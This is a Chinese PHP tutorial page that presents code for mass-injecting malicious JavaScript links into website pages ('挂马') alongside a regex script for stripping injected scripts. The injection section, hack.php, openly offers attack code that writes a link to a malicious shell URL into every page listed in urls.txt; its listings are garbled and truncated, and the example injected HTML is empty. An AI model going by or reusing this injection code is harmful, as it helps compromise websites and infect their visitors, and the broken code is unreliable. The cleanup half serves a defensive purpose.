php下批量挂马和批量清马代码

为了防范网络黑客的攻击,网站管理员需要了解网站被挂马后的处理方式。一般在PHP语言下,网站被挂马的原因是服务端的文件有漏洞,或者被管理员账户密码泄露,网站的代码造成的后果就是在用户请求页面时,程序会在页面HTML代码中嵌入一个恶意脚本或链接,使得用户在访问页面时会自动执行恶意脚本或链接,从而感染用户的电脑或手机。下面我们将为您介绍如何通过PHP代码来批量挂马和清马。

批量挂马代码

  1. 首先,使用以下命令创建一个新的PHP文件批量挂马:

shell
vi hack.php

  1. 写入以下代码,获取目标网站HTML页面并向其中插入恶意JavaScript代码:

```php
\n"; $js .= "var link = document.createElement('a');\n"; $js .= "link.href='".$shell_url."';\n"; $js .= "document.body.appendChild(link);\n"; $js .= "\n";

// 将生成的JavaScript代码插入到目标网站页面中
$html = str_replace("",$js. "", $html);
$handle = fopen($url, "w");
fwrite($handle, $html); // 写入添加恶意链接的页面代码
fclose($handle);
}
?>

```

以上代码中,$urls是包含目标网站URL链接的txt文件,$shell_url是恶意JavaScript链接。代码中首先读取URL列表文件,然后循环遍历每个URL链接中的页面,将恶意代码插入到HTML中,最后将修改后的HTML页面写回到服务器中。

  1. 运行挂马脚本 hack.php ,执行以下命令:

shell
php hack.php

运行后,PHP脚本会根据 urls.txt 文件内的URL信息,将恶意脚本插入到每个HTML页面中。

示例:我们将 urls.txt 文件设置为包含两个URL链接:

https://example.com/page1.html
https://example.com/page2.html

运行脚本后,PHP会替换每个HTML页面文件中的 </head> 元素标签下部分,使用以下代码将恶意链接插入HTML页面中:

```html


```

批量清马代码

  1. 首先,使用以下命令创建一个新的PHP文件批量清理马:

shell
vi clean.php

  1. 写入以下代码,用于批量清理所有PHP文件中的恶意脚本:

```php

.*?<\/script>/si", "", $file_contents);

   // 将处理后的内容写回到文件中
   file_put_contents($file, $cleaned_contents);

} ?> ```

以上代码中,首先定义了 search_files 方法用于递归查找目录下符合条件的文件,然后定义了 $start_dir 文件起始路径和 $regex_pattern 要查找的文件后缀,最后通过正则表达式匹配所有包含恶意脚本的PHP文件,将里面的脚本部分删除并保存修改后的文件。

  1. 运行 clean.php 脚本,执行以下命令:

shell php clean.php

执行该命令后,PHP会查找包含指定后缀的PHP文件,并将其中的恶意脚本删除。

示例:有一个被挂马的PHP文件 foo.php,既包含正常PHP代码也包含恶意代码:

```php

... ...



```

在运行清理脚本之后,上述PHP文件中的恶意脚本代码将被移除,只剩下正常PHP代码:

```php



...


...

```
以上就是批量挂马和清理马的完整攻略。

本站文章如无特殊说明,均为本站原创,如若转载,请注明出处:php下批量挂马和批量清马代码 - Python技术站

(0)
上一篇 2023年5月23日
下一篇 2023年5月23日

相关文章

  • php生成静态文件的多种方法分享

    PHP生成静态文件的多种方法分享 在网站开发中,动态网页的加载速度可能会受到网络、服务器等因素的影响而变得较慢,尤其在高并发情况下,这可能会导致用户的不满,甚至影响网站的使用体验。因此,生成静态文件并使用静态文件来增强网站的访问速度、减轻服务器压力是非常有必要的。现在,我们就来分享一下用PHP生成静态文件的几种方法。 方法一:使用file_put_conte…

    PHP 2023年5月26日
    00
  • php字符串截取的简单方法

    下面是关于“PHP字符串截取的简单方法”完整攻略的介绍: 1. 使用substr函数进行截取 PHP提供了substr函数,可以很方便地截取一个字符串的一部分。该函数有3个参数,分别是要截取的字符串、起始位置和截取的长度。以下是示例代码: $str = "Hello World"; $substr = substr($str, 0, 5)…

    PHP 2023年5月26日
    00
  • PHP7扩展开发教程之Hello World实现方法示例

    当我们需要在PHP中实现一些特殊的功能或者需要处理特殊的数据时,通常需要使用扩展来实现。PHP7扩展开发目前是PHP扩展开发的主流,因此学习PHP7扩展开发是非常必要的。 本文将讲解”PHP7扩展开发教程之Hello World实现方法示例”的完整攻略。 步骤一:环境搭建 在开始使用PHP7进行扩展开发前,我们需要进行环境搭建。环境搭建可以参考PHP官网提供…

    PHP 2023年5月27日
    00
  • php 中文和编码判断代码

    关于PHP中的中文和编码判断代码的攻略,我们可以分为以下几个方面: PHP 中文编码概述 判断字符串是否包含中文 判断字符串的编码类型 示例说明 1. PHP 中文编码概述 PHP中文编码主要有两种: GBK 和 UTF-8。GBK是一个垂直升级的ASCII码,兼容了GB2312的中文编码,很多编码为GBK的程序几乎可以完美处理GB2312编码的中文文本。U…

    PHP 2023年5月24日
    00
  • PHP邮件发送类PHPMailer用法实例详解

    PHPMailer邮件发送类使用攻略 什么是PHPMailer PHPMailer是一个邮件发送类,使用PHP语言编写。它是一个开源的、易于使用的邮件发送类,可以方便地集成到PHP应用程序中,并提供了一系列方法进行邮件发送及附件上传等操作。在开发中,PHPMailer是极其常用的一个类库。 PHPMailer的安装与引用 安装 可以通过composer进行安…

    PHP 2023年5月23日
    00
  • 浅谈PHP设计模式的门面模式

    简介: 门面模式又称之为外观模式,属于结构型的设计模式。用于为子系统中的一组接口提供一致的调用方案。门面模式定义了一个高层接口,引入门面角色之后,只需要直接与门面角色交互,降低了系统的耦合度。 适用场景: 最经典的Laravel的Facade,当使用一些库的时候,不需要了解底层系统如何实现,只需要知道如何使用门面调用即可。 为一些复杂的子系统提供一个简单对外…

    PHP 2023年4月18日
    00
  • PHP判断数组是否为空的常用方法(五种方法)

    PHP中,判断数组是否为空是一个常见的操作,下面介绍五种常用方法: 一、使用empty()函数 empty()函数可以用来判断一个变量是否为空,也可以用来判断一个数组是否为空。 示例一: $arr = []; if (empty($arr)) { echo ‘数组为空’; } else { echo ‘数组不为空’; } 输出结果: 数组为空 示例二: $a…

    PHP 2023年5月26日
    00
  • php实现微信和支付宝支付的示例代码

    下面是PHP实现微信和支付宝支付的示例代码的完整攻略。 一、微信支付 1. 获取微信支付相关信息 1.1. 微信支付功能准备 在开始使用微信支付之前,需要开通微信支付的相关功能,具体流程如下: 注册成为微信商户,https://pay.weixin.qq.com/index.php/core/home/login?return_url=%2Findex.ph…

    PHP 2023年5月23日
    00
合作推广
合作推广
分享本页
返回顶部